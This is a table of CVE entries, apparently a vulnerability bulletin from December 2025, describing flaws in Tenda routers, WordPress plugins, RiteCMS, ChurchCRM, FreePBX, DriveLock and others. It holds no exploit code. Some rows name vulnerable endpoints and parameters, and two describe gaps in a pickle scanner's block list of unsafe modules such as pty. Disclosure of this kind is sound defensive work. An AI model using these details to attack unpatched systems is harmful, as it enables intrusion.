| Tenda--Tenda | A buffer overflow vulnerability in the function fromAdvSetMacMtuWan of the httpd binary in Tenda AC10V4.0 V16.03.10.20 allows remote attackers to cause a denial of service and possibly execute code by sending a POST request with a crafted payload (field `serviceName`) to /goform/AdvSetMacMtuWan. | 2025-12-17 | not yet calculated | CVE-2025-67073 | https://github.com/johnathanhuutri/CVEReport/tree/master/CVE-2025-67073 |
| Tenda--Tenda | A buffer overflow vulnerability in the function fromAdvSetMacMtuWan of the httpd binary in Tenda AC10V4.0 V16.03.10.20 allows remote attackers to cause a denial of service and possibly execute code by sending a POST request with a crafted payload (field `serverName`) to /goform/AdvSetMacMtuWan. | 2025-12-17 | not yet calculated | CVE-2025-67074 | https://github.com/johnathanhuutri/CVEReport/tree/master/CVE-2025-67074 |
| Simple Machines--Simple Machines | A stored cross-site scripting (XSS) vulnerability in Simple Machines Forum v2.1.6 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Forum Name parameter. | 2025-12-18 | not yet calculated | CVE-2025-67163 | https://github.com/SimpleMachines/SMF/security/advisories/GHSA-p2xm-x9fp-5r7x https://github.com/SimpleMachines/SMF/blob/release-3.0/Themes/default/Stats.template.php#L26 https://github.com/SimpleMachines/SMF https://wiki.simplemachines.org/smf/Installing https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67163 |
| Pagekit CMS--Pagekit MS | An authenticated arbitrary file upload vulnerability in the /storage/poc.php component of Pagekit CMS v1.0.18 allows attackers to execute arbitrary code via uploading a crafted PHP file. | 2025-12-17 | not yet calculated | CVE-2025-67164 | https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67164 |
| Pagekit CMS--Pagekit MS | An Insecure Direct Object Reference (IDOR) in Pagekit CMS v1.0.18 allows attackers to escalate privileges. | 2025-12-17 | not yet calculated | CVE-2025-67165 | https://github.com/pagekit/pagekit https://github.com/pagekit/docs/blob/develop/user-interface/users.md#roles https://github.com/pagekit/docs/blob/develop/user-interface/users.md#permissions https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67165 |
| RiteCMS--RiteCMS | RiteCMS v3.1.0 was discovered to use insecure encryption to store passwords. | 2025-12-17 | not yet calculated | CVE-2025-67168 | https://github.com/handylulu/RiteCMS https://github.com/handylulu/RiteCMS/blob/master/cms/includes/functions.admin.inc.php https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67168 |
| RiteCMS--RiteCMS | A reflected cross-site scripting (XSS) vulnerability in RiteCMS v3.1.0 allows attackers to execute arbitrary code in the context of a user's browser via a crafted payload. | 2025-12-17 | not yet calculated | CVE-2025-67170 | https://github.com/handylulu/RiteCMS/ https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67170 |
| RiteCMS--RiteCMS | Incorrect access control in the /templates/ component of RiteCMS v3.1.0 allows attackers to access sensitive files via directory traversal. | 2025-12-17 | not yet calculated | CVE-2025-67171 | https://github.com/handylulu/RiteCMS/ https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67171 |
| RiteCMS--RiteCMS | RiteCMS v3.1.0 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the parse_special_tags() function. | 2025-12-17 | not yet calculated | CVE-2025-67172 | https://github.com/handylulu/RiteCMS/ https://github.com/handylulu/RiteCMS/blob/master/cms/includes/functions.inc.php#L297 https://github.com/handylulu/RiteCMS/blob/master/cms/includes/functions.inc.php#L504 https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67172 |
| RiteCMS--RiteCMS | A Cross-Site Request Forgery (CSRF) in the page creation/editing function of RiteCMS v3.1.0 allows attackers to arbitrarily create pages via a crafted POST request. | 2025-12-17 | not yet calculated | CVE-2025-67173 | https://github.com/handylulu/RiteCMS/ https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67173 |
| RiteCMS--RiteCMS | A local file inclusion (LFI) vulnerability in RiteCMS v3.1.0 allows attackers to read arbitrary files on the host via a directory traversal in the admin_language_file and default_page_language_file in the admin.php component | 2025-12-17 | not yet calculated | CVE-2025-67174 | https://github.com/handylulu/RiteCMS https://github.com/handylulu/RiteCMS/blob/master/admin.php#L46 https://github.com/handylulu/RiteCMS/blob/master/cms/subtemplates/settings.inc.tpl#L64 https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67174 |
| QR-Code--QR-Code | A SQL injection vulnerability was found in the '/cts/admin/?page=zone' file of ITSourcecode COVID Tracking System Using QR-Code v1.0. The reason for this issue is that attackers inject malicious code from the parameter 'id' and use it directly in SQL queries without the need for appropriate cleaning or validation. | 2025-12-17 | not yet calculated | CVE-2025-67285 | https://github.com/bardminx/Lonlydance/issues/1 |
| EVE-NG--EVE-NG | EVE-NG 6.4.0-13-PRO is vulnerable to Directory Traversal. The /api/export interface allows authenticated users to export lab files. This interface lacks effective input validation and filtering when processing file path parameters submitted by users. | 2025-12-19 | not yet calculated | CVE-2025-67442 | https://github.com/XunMInt/cve/blob/main/EVE-NG_20251207.md |
| weDevs--WP ERP | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in weDevs WP ERP erp allows Retrieve Embedded Sensitive Data. This issue affects WP ERP: from n/a through <= 1.16.6. | 2025-12-18 | not yet calculated | CVE-2025-67546 | https://vdp.patchstack.com/database/Wordpress/Plugin/erp/vulnerability/wordpress-wp-erp-plugin-1-16-6-sensitive-data-exposure-vulnerability?_s_id=cve |
| FreePBX--security-reporting | FreePBX is an open-source web-based graphical user interface (GUI) that manages Asterisk. Prior to versions 16.0.45 and 17.0.24 of the FreePBX framework, an authenticated local privilege escalation exists in the deprecated FreePBX startup script `amportal`. In the deprecated `amportal` utility, the lookup for the `freepbx_engine` file occurs in `/etc/asterisk/` directories. Typically, these are configured by FreePBX as writable by the **asterisk** user and any members of the **asterisk** group. This means that a member of the **asterisk** group can add their own `freepbx_engine` file in `/etc/asterisk/` and upon `amportal` executing, it would exec that file with root permissions (even though the file was created and placed by a non-root user). Version 16.0.45 and 17.0.24 contain a fix for the issue. Other mitigation strategies are also available. Confirm only trusted local OS system users are members of the `asterisk` group. Look for suspicious files in the `/etc/asterisk/` directory (via Admin -> Config Edit in the GUI, or via CLI). Double-check that `live_dangerously = no` is set (or unconfigured, as the default is **no**) in `/etc/asterisk/asterisk.conf` file. Eliminate any unsafe custom use of Asterisk dial plan applications and functions that potentially can manipulate the file system, e.g., System(), FILE(), etc. | 2025-12-16 | not yet calculated | CVE-2025-67722 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-p42w-v77m-hfp8 https://www.freepbx.org/watch-what-we-do-with-security-fixes-%f0%9f%91%80 |
| FreePBX--security-reporting | The FreePBX module tts (Text to Speech) is a module for FreePBX, an open-source web-based graphical user interface (GUI) that manages Asterisk. Versions prior to 16.0.5 and 17.0.5 are vulnerable to SQL injection by authenticated users with administrator access. Authenticated users with administrative access to the Administrator Control Panel (ACP) can leverage this SQL injection vulnerability to extract sensitive information from the database and execute code on the system as the `asterisk` user with chained elevation to `root` privileges. Users should upgrade to version 16.0.5 or 17.0.5 to receive a fix. | 2025-12-16 | not yet calculated | CVE-2025-67736 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-632c-49p9-x7cw https://www.freepbx.org/watch-what-we-do-with-security-fixes-%f0%9f%91%80 |
| trailofbits--fickling | Fickling is a Python pickling decompiler and static analyzer. Versions prior to 0.1.6 are missing `marshal` and `types` from the block list of unsafe module imports. Fickling started blocking both modules to address this issue. This allows an attacker to craft a malicious pickle file that can bypass fickling since it misses detections for `types.FunctionType` and `marshal.loads`. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues. The issue was fixed in version 0.1.6. | 2025-12-16 | not yet calculated | CVE-2025-67747 | https://github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3 https://github.com/trailofbits/fickling/pull/186 https://github.com/trailofbits/fickling/commit/4e34561301bda1450268d1d7b0b2b151de33b913 https://github.com/trailofbits/fickling/releases/tag/v0.1.6 |
| trailofbits--fickling | Fickling is a Python pickling decompiler and static analyzer. Versions prior to 0.1.6 had a bypass caused by `pty` missing from the block list of unsafe module imports. This led to unsafe pickles based on `pty.spawn()` being incorrectly flagged as `LIKELY_SAFE`, and was fixed in version 0.1.6. This impacted any user or system that used Fickling to vet pickle files for security issues. | 2025-12-16 | not yet calculated | CVE-2025-67748 | https://github.com/trailofbits/fickling/security/advisories/GHSA-r7v6-mfhq-g3m2 https://github.com/trailofbits/fickling/pull/108 https://github.com/trailofbits/fickling/pull/187 |
| DriveLock--DriveLock | An issue was discovered in DriveLock 24.1 before 24.1.6, 24.2 before 24.2.7, and 25.1 before 25.1.5. Local unprivileged users can manipulate privileged processes to gain more privileges on Windows computers. | 2025-12-17 | not yet calculated | CVE-2025-67781 | https://drivelock.help/en-us/Content/Home.htm |
| DriveLock--DriveLock | An issue was discovered in 25.1.2 before 25.1.5. A Cross Site Scripting (XSS) issue in DriveLock Operations Center allows for session takeover over a network. | 2025-12-17 | not yet calculated | CVE-2025-67787 | https://drivelock.help/versions/current/web/en/releasenotes/Content/ReleaseNotes_DriveLock/SecurityBulletins/25-002-CrossSiteScripting.htm |
| DriveLock--DriveLock | An issue was discovered in DriveLock 24.1 before 24.1.6, 24.2 before 24.2.7, and 25.1 before 25.1.5. Authenticated users can retrieve the computer count of other DriveLock tenants via the DriveLock API. | 2025-12-17 | not yet calculated | CVE-2025-67789 | https://drivelock.help/versions/current/web/en/releasenotes/Content/ReleaseNotes_DriveLock/SecurityBulletins/25-004-DESInfoDisclosure.htm |
| DriveLock--DriveLock | An issue was discovered in DriveLock 24.1 before 24.1.6, 24.2 before 24.2.7, and 25.1 before 25.1.5. An unprivileged user could cause occasionally a Blue Screen Of Death (BSOD) on Windows computers by using an IOCTL and an unterminated string. | 2025-12-17 | not yet calculated | CVE-2025-67790 | https://drivelock.help/versions/2025_1/web/en/releasenotes/Content/ReleaseNotes_DriveLock/SecurityBulletins/25-005-BufferOverreadBSOD.htm |
| DriveLock--DriveLock | An issue was discovered in DriveLock 24.1 through 24.1.*, 24.2 through 24.2.*, and 25.1 through 25.1.*. An incomplete configuration (agent authentication) in DriveLock tenant allows attackers to impersonate any DriveLock agent on the network against the DES (DriveLock Enterprise Service). | 2025-12-17 | not yet calculated | CVE-2025-67791 | https://drivelock.help/versions/current/web/en/releasenotes/Content/ReleaseNotes_DriveLock/SecurityBulletins/25-006-DESMisconfig.htm |
| DriveLock--DriveLock | An issue was discovered in DriveLock 24.1 before 24.1.6, 24.2 before 24.2.7, and 25.1 before 25.1.5. Local unprivileged users can manipulate a DriveLock process to execute arbitrary commands on Windows computers. | 2025-12-17 | not yet calculated | CVE-2025-67792 | https://drivelock.help/versions/current/web/en/releasenotes/Content/ReleaseNotes_DriveLock/SecurityBulletins/25-007-LocalPrivilegeEsc.htm |
| DriveLock--DriveLock | An issue was discovered in DriveLock 24.1 through 24.1.*, 24.2 through 24.2.*, and 25.1 before 25.1.6. Users with the "Manage roles and permissions" privilege can promote themselves or other DOC users to the Supervisor role through an API call. This privilege is included by default in the Administrator role. This issue mainly affects cloud multi-tenant deployments; on-prem single-tenant installations are typically not impacted because local admins usually already have Supervisor privileges. | 2025-12-17 | not yet calculated | CVE-2025-67793 | https://drivelock.help/sb/Content/SecurityBulletins/25-008-DESPrivilegeEsc.htm |
| DriveLock--DriveLock | An issue was discovered in DriveLock 24.1 through 24.1.*, 24.2 before 24.2.8, and 25.1 before 25.1.6. Directories and files created by the agent are created with overly permissive ACLs, allowing local users without administrator rights to trigger actions or destabilize the agent. | 2025-12-17 | not yet calculated | CVE-2025-67794 | https://drivelock.help/sb/Content/SecurityBulletins/25-009-AgIncPermissions.htm |
| Zimbra--Zimbra | An issue was discovered in Zimbra Collaboration (ZCS) 10.0 and 10.1. A hardcoded Flickr API key and secret are present in the publicly accessible Flickr Zimlet used by Zimbra Collaboration. Because these credentials are embedded directly in the Zimlet, any unauthorized party could retrieve them and misuse the Flickr integration. An attacker with access to the exposed credentials could impersonate the legitimate application and initiate valid Flickr OAuth flows. If a user is tricked into approving such a request, the attacker could gain access to the user's Flickr data. The hardcoded credentials have since been removed from the Zimlet code, and the associated key has been revoked. | 2025-12-15 | not yet calculated | CVE-2025-67809 | https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories https://wiki.zimbra.com/wiki/Security_Center https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Prior to version 6.5.0, the application echoes back plaintext passwords submitted by users in subsequent HTTP responses. This information disclosure significantly increases the risk of credential compromise and may amplify the impact of other vulnerabilities (e.g., XSS, IDOR, session fixation), enabling attackers to harvest other users' passwords. Version 6.5.0 fixes the issue. | 2025-12-16 | not yet calculated | CVE-2025-67874 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-p98h-5xcj-5c6x https://github.com/ChurchCRM/CRM/commit/2d6cf7aed9af1b9b47e125d1a2266f8e2a88f3fd |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. A privilege escalation vulnerability exists in ChurchCRM prior to version 6.5.3. An authenticated user with specific mid-level permissions ("Edit Records" and "Manage Properties and Classifications") can inject a persistent Cross-Site Scripting (XSS) payload into an administrator's profile. The payload executes when the administrator views their own profile page, allowing the attacker to hijack the administrator's session, perform administrative actions, and achieve a full account takeover. This vulnerability is a combination of two separate flaws: an Insecure Direct Object Reference (IDOR) that allows any user to view any other user's profile, and a Broken Access Control vulnerability that allows a user with general edit permissions to modify any other user's record properties. Version 6.5.3 fixes the issue. | 2025-12-17 | not yet calculated | CVE-2025-67875 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-fcw7-mmfh-7vjm |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. A stored cross-site scripting (XSS) vulnerability exists in ChurchCRM versions 6.4.0 and prior that allows a low-privilege user with the "Manage Groups" permission to inject persistent JavaScript into group role names. The payload is saved in the database and executed whenever any user (including administrators) views a page that displays that role, such as GroupView.php or PersonView.php. This allows full session hijacking and account takeover. As of time of publication, no known patched versions are available. | 2025-12-17 | not yet calculated | CVE-2025-67876 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-j9gv-26c7-3qrh |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Versions prior to 6.5.3 have a SQL injection vulnerability in the `src/CartToFamily.php` file, specifically in how the `PersonAddress` POST parameter is handled. Unlike other parameters in the same file which are correctly cast to integers using the `InputUtils` class, the `PersonAddress` parameter is missing the type definition. This allows an attacker to inject arbitrary SQL commands directly into the query. Version 6.5.3 fixes the issue. | 2025-12-17 | not yet calculated | CVE-2025-67877 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-h3vq-9gr6-h9r4 |
| Apache Software Foundation--Apache Airflow Providers Edge3 | Edge3 Worker RPC RCE on Airflow 2. This issue affects Apache Airflow Providers Edge3: before 2.0.0 - and only if you installed and configured it on Airflow 2. The Edge3 provider support in Airflow 2 has always been development-only and not officially released; however, if you installed and configured the Edge3 provider in Airflow 2, it implicitly enabled a (normally) non-public API which was used to test the Edge Provider in Airflow 2 during development. This API allowed a Dag author to perform Remote Code Execution in the webserver context, which a Dag author was not supposed to be able to do. If you installed and configured the Edge3 provider for Airflow 2, you should uninstall it and migrate to Airflow 3. The new Edge3 provider versions (>=2.0.0) have the minimum version of Airflow set to 3 and the RCE-prone Airflow 2 code is removed, so it should no longer be possible to use the Edge3 provider 2.0.0+ on Airflow 2. If you used the Edge Provider in Airflow 3, you are not affected. | 2025-12-17 | not yet calculated | CVE-2025-67895 | https://github.com/apache/airflow/pull/59143 https://lists.apache.org/thread/hhnmmzkj5qx5gbk6pdkh8tcsx5oj1nqs |
| Gal Dubinski--Stars Testimonials | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gal Dubinski Stars Testimonials stars-testimonials-with-slider-and-masonry-grid allows Stored XSS. This issue affects Stars Testimonials: from n/a through <= 3.3.4. | 2025-12-16 | not yet calculated | CVE-2025-67912 | https://vdp.patchstack.com/database/Wordpress/Plugin/stars-testimonials-with-slider-and-masonry-grid/vulnerability/wordpress-stars-testimonials-plugin-3-3-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| templateinvaders--TI WooCommerce Wishlist | Missing Authorization vulnerability in templateinvaders TI WooCommerce Wishlist ti-woocommerce-wishlist allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects TI WooCommerce Wishlist: from n/a through <= 2.10.0. | 2025-12-16 | not yet calculated | CVE-2025-67929 | https://vdp.patchstack.com/database/Wordpress/Plugin/ti-woocommerce-wishlist/vulnerability/wordpress-ti-woocommerce-wishlist-plugin-2-10-0-broken-access-control-vulnerability-2?_s_id=cve |
| SendPulse--SendPulse Email Marketing Newsletter | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in SendPulse SendPulse Email Marketing Newsletter sendpulse-email-marketing-newsletter allows Retrieve Embedded Sensitive Data. This issue affects SendPulse Email Marketing Newsletter: from n/a through <= 2.2.1. | 2025-12-16 | not yet calculated | CVE-2025-67948 | https://vdp.patchstack.com/database/Wordpress/Plugin/sendpulse-email-marketing-newsletter/vulnerability/wordpress-sendpulse-email-marketing-newsletter-plugin-2-2-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| Syed Balkhi--All In One SEO Pack | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Syed Balkhi All In One SEO Pack all-in-one-seo-pack allows Blind SQL Injection. This issue affects All In One SEO Pack: from n/a through <= 4.9.1. | 2025-12-16 | not yet calculated | CVE-2025-67950 | https://vdp.patchstack.com/database/Wordpress/Plugin/all-in-one-seo-pack/vulnerability/wordpress-all-in-one-seo-pack-plugin-4-9-1-sql-injection-vulnerability?_s_id=cve |
| WPZOOM--WPZOOM Addons for Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPZOOM WPZOOM Addons for Elementor wpzoom-elementor-addons allows DOM-Based XSS. This issue affects WPZOOM Addons for Elementor: from n/a through <= 1.2.10. | 2025-12-16 | not yet calculated | CVE-2025-67951 | https://vdp.patchstack.com/database/Wordpress/Plugin/wpzoom-elementor-addons/vulnerability/wordpress-wpzoom-addons-for-elementor-plugin-1-2-10-cross-site-scripting-xss-vulnerability?_s_id=cve |
| AIOSEO Plugin Team--Broken Link Checker | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AIOSEO Plugin Team Broken Link Checker broken-link-checker-seo allows SQL Injection. This issue affects Broken Link Checker: from n/a through <= 1.2.6. | 2025-12-16 | not yet calculated | CVE-2025-67962 | https://vdp.patchstack.com/database/Wordpress/Plugin/broken-link-checker-seo/vulnerability/wordpress-broken-link-checker-plugin-1-2-6-sql-injection-vulnerability?_s_id=cve |
| favethemes--Homey Core | Missing Authorization vulnerability in favethemes Homey Core homey-core allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Homey Core: from n/a through <= 2.4.3. | 2025-12-16 | not yet calculated | CVE-2025-67965 | https://vdp.patchstack.com/database/Wordpress/Plugin/homey-core/vulnerability/wordpress-homey-core-plugin-2-4-3-broken-access-control-vulnerability?_s_id=cve |
| Bob--Watu Quiz | Missing Authorization vulnerability in Bob Watu Quiz watu allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Watu Quiz: from n/a through <= 3.4.5. | 2025-12-16 | not yet calculated | CVE-2025-67976 | https://vdp.patchstack.com/database/Wordpress/Plugin/watu/vulnerability/wordpress-watu-quiz-plugin-3-4-5-broken-access-control-vulnerability?_s_id=cve |
| osama.esh--WP Visitor Statistics (Real Time Traffic) | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in osama.esh WP Visitor Statistics (Real Time Traffic) wp-stats-manager allows DOM-Based XSS. This issue affects WP Visitor Statistics (Real Time Traffic): from n/a through <= 8.3. | 2025-12-16 | not yet calculated | CVE-2025-67983 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-stats-manager/vulnerability/wordpress-wp-visitor-statistics-real-time-traffic-plugin-8-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Barn2 Plugins--Document Library Lite | Authorization Bypass Through User-Controlled Key vulnerability in Barn2 Plugins Document Library Lite document-library-lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Document Library Lite: from n/a through <= 1.1.7. | 2025-12-16 | not yet calculated | CVE-2025-67985 | https://vdp.patchstack.com/database/Wordpress/Plugin/document-library-lite/vulnerability/wordpress-document-library-lite-plugin-1-1-7-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Barn2 Plugins--Document Library Lite | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Barn2 Plugins Document Library Lite document-library-lite allows DOM-Based XSS. This issue affects Document Library Lite: from n/a through <= 1.1.7. | 2025-12-16 | not yet calculated | CVE-2025-67986 | https://vdp.patchstack.com/database/Wordpress/Plugin/document-library-lite/vulnerability/wordpress-document-library-lite-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LMPixels--Kerge | Server-Side Request Forgery (SSRF) vulnerability in LMPixels Kerge kerge allows Server Side Request Forgery. This issue affects Kerge: from n/a through <= 4.1.3. | 2025-12-16 | not yet calculated | CVE-2025-67989 | https://vdp.patchstack.com/database/Wordpress/Theme/kerge/vulnerability/wordpress-kerge-theme-4-1-3-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Stefano Lissa--Newsletter | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Stefano Lissa Newsletter newsletter allows Blind SQL Injection. This issue affects Newsletter: from n/a through <= 9.0.9. | 2025-12-16 | not yet calculated | CVE-2025-67999 | https://vdp.patchstack.com/database/Wordpress/Plugin/newsletter/vulnerability/wordpress-newsletter-plugin-9-0-9-sql-injection-vulnerability?_s_id=cve |
| LambertGroup--xPromoter | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup xPromoter top_bar_promoter allows Blind SQL Injection. This issue affects xPromoter: from n/a through <= 1.3.4. | 2025-12-16 | not yet calculated | CVE-2025-68053 | https://vdp.patchstack.com/database/Wordpress/Plugin/top_bar_promoter/vulnerability/wordpress-xpromoter-plugin-1-3-4-sql-injection-vulnerability?_s_id=cve |
| LambertGroup--CountDown With Image or Video Background | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup CountDown With Image or Video Background countdown_with_background allows Blind SQL Injection. This issue affects CountDown With Image or Video Background: from n/a through <= 1.5. | 2025-12-16 | not yet calculated | CVE-2025-68054 | https://vdp.patchstack.com/database/Wordpress/Plugin/countdown_with_background/vulnerability/wordpress-countdown-with-image-or-video-background-plugin-1-5-sql-injection-vulnerability?_s_id=cve |
| Themefic--Hydra Booking | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Themefic Hydra Booking hydra-booking allows SQL Injection. This issue affects Hydra Booking: from n/a through <= 1.1.32. | 2025-12-16 | not yet calculated | CVE-2025-68055 | https://vdp.patchstack.com/database/Wordpress/Plugin/hydra-booking/vulnerability/wordpress-hydra-booking-plugin-1-1-32-sql-injection-vulnerability?_s_id=cve |
| LambertGroup--LBG Zoominoutslider | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup LBG Zoominoutslider lbg_zoominoutslider allows SQL Injection. This issue affects LBG Zoominoutslider: from n/a through <= 5.4.5. | 2025-12-16 | not yet calculated | CVE-2025-68056 | https://vdp.patchstack.com/database/Wordpress/Plugin/lbg_zoominoutslider/vulnerability/wordpress-lbg-zoominoutslider-plugin-5-4-5-sql-injection-vulnerability?_s_id=cve |
| ThemeMove--EduMall | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove EduMall edumall allows PHP Local File Inclusion. This issue affects EduMall: from n/a through <= 4.4.7. | 2025-12-16 | not yet calculated | CVE-2025-68061 | https://vdp.patchstack.com/database/Wordpress/Theme/edumall/vulnerability/wordpress-edumall-theme-4-4-7-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeMove--MinimogWP | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove MinimogWP minimog allows PHP Local File Inclusion. This issue affects MinimogWP: from n/a through <= 3.9.6. | 2025-12-16 | not yet calculated | CVE-2025-68062 | https://vdp.patchstack.com/database/Wordpress/Theme/minimog/vulnerability/wordpress-minimogwp-theme-3-9-6-local-file-inclusion-vulnerability?_s_id=cve |
| LiquidThemes--Hub Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in LiquidThemes Hub Core hub-core allows PHP Local File Inclusion. This issue affects Hub Core: from n/a through <= 5.0.8. | 2025-12-16 | not yet calculated | CVE-2025-68065 | https://vdp.patchstack.com/database/Wordpress/Plugin/hub-core/vulnerability/wordpress-hub-core-plugin-5-0-8-local-file-inclusion-vulnerability?_s_id=cve |
| PenciDesign--Soledad | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in PenciDesign Soledad soledad allows PHP Local File Inclusion. This issue affects Soledad: from n/a through <= 8.7.0. | 2025-12-16 | not yet calculated | CVE-2025-68066 | https://vdp.patchstack.com/database/Wordpress/Theme/soledad/vulnerability/wordpress-soledad-theme-8-7-0-local-file-inclusion-vulnerability?_s_id=cve |
| Select-Themes--Stockholm Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes Stockholm Core stockholm-core allows PHP Local File Inclusion. This issue affects Stockholm Core: from n/a through <= 2.4.6. | 2025-12-16 | not yet calculated | CVE-2025-68067 | https://vdp.patchstack.com/database/Wordpress/Plugin/stockholm-core/vulnerability/wordpress-stockholm-core-plugin-2-4-6-local-file-inclusion-vulnerability?_s_id=cve |
| Select-Themes--Stockholm | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes Stockholm stockholm allows PHP Local File Inclusion. This issue affects Stockholm: from n/a through <= 9.14.1. | 2025-12-16 | not yet calculated | CVE-2025-68068 | https://vdp.patchstack.com/database/Wordpress/Theme/stockholm/vulnerability/wordpress-stockholm-theme-9-14-1-local-file-inclusion-vulnerability?_s_id=cve |
| Vektor,Inc.--VK Google Job Posting Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Vektor,Inc. VK Google Job Posting Manager vk-google-job-posting-manager allows Stored XSS. This issue affects VK Google Job Posting Manager: from n/a through <= 1.2.21. | 2025-12-16 | not yet calculated | CVE-2025-68070 | https://vdp.patchstack.com/database/Wordpress/Plugin/vk-google-job-posting-manager/vulnerability/wordpress-vk-google-job-posting-manager-plugin-1-2-21-cross-site-scripting-xss-vulnerability?_s_id=cve |
| g5theme--Essential Real Estate | Authorization Bypass Through User-Controlled Key vulnerability in g5theme Essential Real Estate essential-real-estate allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Essential Real Estate: from n/a through <= 5.2.2. | 2025-12-16 | not yet calculated | CVE-2025-68071 | https://vdp.patchstack.com/database/Wordpress/Plugin/essential-real-estate/vulnerability/wordpress-essential-real-estate-plugin-5-2-2-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Select-Themes--Stockholm Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Select-Themes Stockholm Core stockholm-core allows Stored XSS. This issue affects Stockholm Core: from n/a through <= 2.4.6. | 2025-12-16 | not yet calculated | CVE-2025-68076 | https://vdp.patchstack.com/database/Wordpress/Plugin/stockholm-core/vulnerability/wordpress-stockholm-core-plugin-2-4-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Select-Themes--Stockholm | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Select-Themes Stockholm stockholm allows Stored XSS. This issue affects Stockholm: from n/a through <= 9.14.1. | 2025-12-16 | not yet calculated | CVE-2025-68077 | https://vdp.patchstack.com/database/Wordpress/Theme/stockholm/vulnerability/wordpress-stockholm-theme-9-14-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeNectar--Salient Portfolio | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeNectar Salient Portfolio salient-portfolio allows Stored XSS. This issue affects Salient Portfolio: from n/a through <= 1.8.2. | 2025-12-16 | not yet calculated | CVE-2025-68078 | https://vdp.patchstack.com/database/Wordpress/Theme/salient-portfolio/vulnerability/wordpress-salient-portfolio-theme-1-8-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeNectar--Salient Shortcodes | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeNectar Salient Shortcodes salient-shortcodes allows Stored XSS. This issue affects Salient Shortcodes: from n/a through <= 1.5.4. | 2025-12-16 | not yet calculated | CVE-2025-68079 | https://vdp.patchstack.com/database/Wordpress/Plugin/salient-shortcodes/vulnerability/wordpress-salient-shortcodes-plugin-1-5-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Saad Iqbal--User Avatar - Reloaded | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Saad Iqbal User Avatar - Reloaded user-avatar-reloaded allows Stored XSS. This issue affects User Avatar - Reloaded: from n/a through <= 1.2.2. | 2025-12-16 | not yet calculated | CVE-2025-68080 | https://vdp.patchstack.com/database/Wordpress/Plugin/user-avatar-reloaded/vulnerability/wordpress-user-avatar-reloaded-plugin-1-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
